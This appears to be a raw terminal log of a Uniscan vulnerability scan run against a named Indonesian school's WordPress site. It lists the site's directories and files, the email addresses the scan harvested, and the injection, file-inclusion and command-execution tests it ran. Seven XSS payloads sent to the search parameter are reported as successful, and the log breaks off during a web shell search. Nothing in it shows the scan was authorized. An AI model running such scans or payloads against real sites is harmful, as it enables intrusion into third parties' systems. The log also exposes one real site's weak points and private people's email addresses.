877

1. root@javanese:~# uniscan -u http://smpnsata.sch.id/ -qweds
2. ####################################
3. # Uniscan project #
4. # http://uniscan.sourceforge.net/ #
5. ####################################
6. V. 6.2
7.  
8.  
9. Scan date: 2-9-2014 11:19:47
10. ===================================================================================================
11. | Domain: http://smpnsata.sch.id/
12. | IP: 192.185.52.208
13. ===================================================================================================
14. |
15. | Directory check:
16. | [+] CODE: 200 URL: http://smpnsata.sch.id/aaa/
17. | [+] CODE: 200 URL: http://smpnsata.sch.id/cpanel/
18. | [+] CODE: 200 URL: http://smpnsata.sch.id/feed/
19. | [+] CODE: 200 URL: http://smpnsata.sch.id/fe/
20. | [+] CODE: 200 URL: http://smpnsata.sch.id/head/
21. | [+] CODE: 200 URL: http://smpnsata.sch.id/ide/
22. | [+] CODE: 200 URL: http://smpnsata.sch.id/lang/
23. | [+] CODE: 200 URL: http://smpnsata.sch.id/lan/
24. | [+] CODE: 200 URL: http://smpnsata.sch.id/pe/
25. | [+] CODE: 200 URL: http://smpnsata.sch.id/pro/
26. | [+] CODE: 200 URL: http://smpnsata.sch.id/rss/
27. | [+] CODE: 200 URL: http://smpnsata.sch.id/rs/
28. | [+] CODE: 200 URL: http://smpnsata.sch.id/tips/
29. ===================================================================================================
30. |
31. | File check:
32. | [+] CODE: 200 URL: http://smpnsata.sch.id/favicon.ico
33. | [+] CODE: 200 URL: http://smpnsata.sch.id/index.php
34. | [+] CODE: 200 URL: http://smpnsata.sch.id/license.txt
35. | [+] CODE: 200 URL: http://smpnsata.sch.id/mailman/listinfo
36. | [+] CODE: 200 URL: http://smpnsata.sch.id/readme.html
37. | [+] CODE: 200 URL: http://smpnsata.sch.id/robots.txt
38. | [+] CODE: 200 URL: http://smpnsata.sch.id/search/htx/sqlqhit.asp
39. | [+] CODE: 200 URL: http://smpnsata.sch.id/search/htx/SQLQHit.asp
40. | [+] CODE: 200 URL: http://smpnsata.sch.id/search/sqlqhit.asp
41. | [+] CODE: 200 URL: http://smpnsata.sch.id/search/SQLQHit.asp
42. | [+] CODE: 200 URL: http://smpnsata.sch.id/sitemap.xml
43. | [+] CODE: 200 URL: http://smpnsata.sch.id/xmlrpc.php
44. ===================================================================================================
45. |
46. | Check robots.txt:
47. | [+] User-agent: *
48. | [+] Disallow: /wp-admin/
49. | [+] Disallow: /wp-includes/
50. | [+]
51. | [+] Sitemap: http://smpnsata.sch.id/sitemap.xml.gz
52. |
53. | Check sitemap.xml:
54. | [+] http://smpnsata.sch.id/
55. | [+] http://smpnsata.sch.id/tata-tertib-lab-bahasa-smp-negeri-1-tayu/
56. | [+] http://smpnsata.sch.id/lomba-keroncong-kodim-0718-pati/
57. | [+] http://smpnsata.sch.id/purnawiyata-siswa-kelas-ix-smp-n-1-tayu/
58. | [+] http://smpnsata.sch.id/pelaksanaan-un-di-smp-n-1-tayu-smpnsata-sukses/
59. | [+] http://smpnsata.sch.id/juara-umum-lomba-mapel-ipa/
60. | [+] http://smpnsata.sch.id/hasil-uji-coba-ujian-nasional/
61. | [+] http://smpnsata.sch.id/prosedur-operasi-standar-ujian-nasional/
62. | [+] http://smpnsata.sch.id/sekolah-favorit-pati-belahan-utara/
63. | [+] http://smpnsata.sch.id/kegiatan-siswa-smp-n-1-tayu/
64. | [+] http://smpnsata.sch.id/kurikulum-pendidikan-baru-tahun-ajaran-2013/
65. | [+] http://smpnsata.sch.id/b-j-habibie-tidak-hanya-dikagumi-rakyat-indonesia-tetapi-juga-masyarakat-dunia/
66. | [+] http://smpnsata.sch.id/rsbi-ciptakan-isu-diskriminasi-pendidikan/
67. | [+] http://smpnsata.sch.id/25-antivirus-terbaik-tahun-2012/
68. | [+] http://smpnsata.sch.id/hasil-tryout-i/
69. | [+] http://smpnsata.sch.id/beda-watak-orang-indonesia-dan-jepang/
70. | [+] http://smpnsata.sch.id/otak-tidak-sensitif-terhadap-rasa-sakit/
71. | [+] http://smpnsata.sch.id/menyikap-fenomena-tawuran-antara-pelajar/
72. | [+] http://smpnsata.sch.id/10-cara-menjadi-pelajar-berprestasi/
73. | [+] http://smpnsata.sch.id/tips-sukses-olimpiade/
74. | [+] http://smpnsata.sch.id/riwayat-singkat-berdirinya-smp-tayu/
75. | [+] http://smpnsata.sch.id/sambutan/
76. | [+] http://smpnsata.sch.id/prestasi/
77. | [+] http://smpnsata.sch.id/gagasan/
78. | [+] http://smpnsata.sch.id/profil-smp-n-1-tayu/
79. | [+] http://smpnsata.sch.id/tips-sukses-dalam-belajar/
80. | [+] http://smpnsata.sch.id/tips-sukses-menghadapi-ujian-nasional/
81. | [+] http://smpnsata.sch.id/guru-pahlawan-pendidikan/
82. | [+] http://smpnsata.sch.id/wajib-belajar-12-tahun-dan-kurikulum-baru/
83. | [+] http://smpnsata.sch.id/fenomena-tawuran-antar-pelajar/
84. | [+] http://smpnsata.sch.id/masalah-pendidikan-di-indonesia/
85. | [+] http://smpnsata.sch.id/menanamkan-pendidikan-karakter-bangsa-adalah-suatu-prioritas/
86. | [+] http://smpnsata.sch.id/pentingnya-pendidikan-karakter-dalam-dunia-pendidikan/
87. | [+] http://smpnsata.sch.id/ujicoba-publik-isi-kurikulum-2013/
88. | [+] http://smpnsata.sch.id/proses-pengembangan-kurikulum-baru/
89. | [+] http://smpnsata.sch.id/langkah-awal-dalam-pendidikan-karakter/
90. ===================================================================================================
91. |
92. | Crawler Started:
93. | Plugin name: E-mail Detection v.1.1 Loaded.
94. | Plugin name: Code Disclosure v.1.1 Loaded.
95. | Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
96. | Plugin name: Upload Form Detect v.1.1 Loaded.
97. | Plugin name: FCKeditor upload test v.1 Loaded.
98. | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
99. | Plugin name: phpinfo() Disclosure v.1 Loaded.
100. | Plugin name: External Host Detect v.1.2 Loaded.
101. | [+] Crawling finished, 808 URL's found!
102. |
103. | E-mails:
104. | [+] E-mail Found: polonia2@gmail.com
105. | [+] E-mail Found: gidibao@gmail.com
106. | [+] E-mail Found: to@ryvkin.ru
107. | [+] E-mail Found: m@tidakada.com
108. | [+] E-mail Found: snowdog@o2.pl
109. | [+] E-mail Found: hazem.khaled@gmail.com
110. | [+] E-mail Found: kahi@kahi.cz
111. | [+] E-mail Found: m2j@t-2.net
112. | [+] E-mail Found: ashish@outshinesolutions.com
113. | [+] E-mail Found: forkless@gmail.com
114. | [+] E-mail Found: milanche@m2-j.info
115. | [+] E-mail Found: hugo5688@gmail.com
116. | [+] E-mail Found: m.eriksson@rocketmail.com
117. | [+] E-mail Found: equipajedemano@gmail.com
118. | [+] E-mail Found: email@smpnsata.sch.id
119. | [+] E-mail Found: steagl@wordpress-it.it
120. | [+] E-mail Found: baris.unver@beyn.org
121. | [+] E-mail Found: mathewhendry@hotmail.com
122. | [+] E-mail Found: tobias@tobiasbergius.se
123. | [+] E-mail Found: pratyush.krishna@outshinesolutions.com
124. | [+] E-mail Found: webmaster@hiromasa.zone.ne.jp
125. | [+] E-mail Found: himself@arnebrachhold.de
126. | [+] E-mail Found: stereo@stereo-lisa.org.ua
127. | [+] E-mail Found: mailman@smpnsata.sch.id
128. | [+] E-mail Found: rafael.lima@email.com.br
129. | [+] E-mail Found: olli@jarva.fi
130. | [+] E-mail Found: info@getid3.org
131. | [+] E-mail Found: unfusion95@gmail.com
132. | [+] E-mail Found: lupus.lupine@gmail.com
133. |
134. | Source Code Disclosure:
135. |
136. | Web Backdoors:
137. |
138. | File Upload Forms:
139. |
140. | FCKeditor File Upload:
141. |
142. | Timthumb:
143. |
144. | PHPinfo() Disclosure:
145. |
146. | External hosts:
147. | [+] External Host Found: https://ssl.gstatic.com
148. | [+] External Host Found: http://codex.wordpress.org
149. | [+] External Host Found: http://www.mysql.com
150. | [+] External Host Found: http://www.gnu.org
151. | [+] External Host Found: http://php.net
152. | [+] External Host Found: https://wordpress.org
153. | [+] External Host Found: http://html5shim.googlecode.com
154. | [+] External Host Found: http://planet.wordpress.org
155. | [+] External Host Found: http://ajax.googleapis.com
156. | [+] External Host Found: http://httpd.apache.org
157. |
158. | Ignored Files:
159. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-zh_TW.mo
160. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-hu_HU.mo
161. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-pl_PL.mo
162. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-ru_RU.mo
163. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-pt_BR.mo
164. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-ja.mo
165. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-de_DE.mo
166. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-fr_FR.mo
167. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-bg_BG.mo
168. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-ja_UTF.mo
169. | http://smpnsata.sch.id/wp-admin/css/wp-admin.min.css?ver=3.9.2
170. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-it_IT.mo
171. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-sv_SE.mo
172. | http://smpnsata.sch.id/wp-includes/js/tinymce/skins/lightgray/fonts/readme.md
173. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-uk_UA.mo
174. | http://smpnsata.sch.id//wp-includes/wlwmanifest.xml
175. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-tr_TR.mo
176. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-es_ES.mo
177. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-zh_CN.mo
178. | http://smpnsata.sch.id/wp-includes/js/tinymce/wp-tinymce.js.gz
179. | http://smpnsata.sch.id/wp-admin/css/ie.min.css?ver=3.9.2
180. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-sl_SI.mo
181. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-fi_FI.mo
182. | http://smpnsata.sch.id/wp-content/uploads/2014/08/TATA-TERTIB-LAB-BHS-TBS.docx
183. | http://smpnsata.sch.id//wp-includes/js/tinymce/skins/lightgray/fonts/readme.md
184. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-cs_CZ.mo
185. | http://smpnsata.sch.id/wp-includes/css/dashicons.min.css?ver=3.9.2
186. | http://smpnsata.sch.id//wp-includes/js/tinymce/wp-tinymce.js.gz
187. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-ar.mo
188. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-da_DK.mo
189. | http://smpnsata.sch.id/wp-admin/css/install.min.css?ver=3.9.2
190. | http://smpnsata.sch.id/wp-content/uploads/2014/08/INSTRUMEN-DAN-RUBRIK-PENILAIAN-KURIKULUM-2013.docx
191. | http://smpnsata.sch.id/wp-admin/css/install.css?ver=20100228
192. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-ja_EUC.mo
193. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-ja_SJIS.mo
194. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-nl_NL.mo
195. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-hi_IN.mo
196. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-ko_KR.mo
197. | http://smpnsata.sch.id/wp-content/plugins/google-sitemap-generator/lang/sitemap-by_BY.mo
198. | http://smpnsata.sch.id/wp-includes/css/buttons.min.css?ver=3.9.2
199. | http://smpnsata.sch.id/wp-includes/wlwmanifest.xml
200. ===================================================================================================
201. | Dynamic tests:
202. | Plugin name: Learning New Directories v.1.2 Loaded.
203. | Plugin name: FCKedior tests v.1.1 Loaded.
204. | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
205. | Plugin name: Find Backup Files v.1.2 Loaded.
206. | Plugin name: Blind SQL-injection tests v.1.3 Loaded.
207. | Plugin name: Local File Include tests v.1.1 Loaded.
208. | Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
209. | Plugin name: Remote Command Execution tests v.1.1 Loaded.
210. | Plugin name: Remote File Include tests v.1.2 Loaded.
211. | Plugin name: SQL-injection tests v.1.2 Loaded.
212. | Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
213. | Plugin name: Web Shell Finder v.1.3 Loaded.
214. | [+] 37 New directories added
215. |
216. |
217. | FCKeditor tests:
218. |
219. |
220. | Timthumb < 1.33 vulnerability:
221. |
222. |
223. | Backup Files:
224. | Skipped because http://smpnsata.sch.id/wp-content/themes/pendidikan/testing123 did not return the code 404
225. |
226. |
227. | Blind SQL Injection:
228. |
229. |
230. | Local File Include:
231. |
232. |
233. | PHP CGI Argument Injection:
234. |
235. |
236. | Remote Command Execution:
237. |
238. |
239. | Remote File Include:
240. |
241. |
242. | SQL Injection:
243. |
244. |
245. | Cross-Site Scripting (XSS):
246. | [+] Vul [XSS] http://smpnsata.sch.id/
247. | Post data: &s=<script>alert('XSS')</script>
248. | [+] Vul [XSS] http://smpnsata.sch.id/
249. | Post data: &s=<IMG SRC="javascript:alert('XSS');">
250. | [+] Vul [XSS] http://smpnsata.sch.id/
251. | Post data: &s=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
252. | [+] Vul [XSS] http://smpnsata.sch.id/
253. | Post data: &s=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
254. | [+] Vul [XSS] http://smpnsata.sch.id/
255. | Post data: &s=<body onload="javascript:alert('XSS')"></body>
256. | [+] Vul [XSS] http://smpnsata.sch.id/
257. | Post data: &s=<DIV STYLE="background-image: url(javascript:alert('XSS'))">
258. | [+] Vul [XSS] http://smpnsata.sch.id/
259. | Post data: &s=<table background="javascript:alert('XSS')"></table>
260. |
261. |
262. | Web Shell Finder:
263. [*] Remaining tests: 8461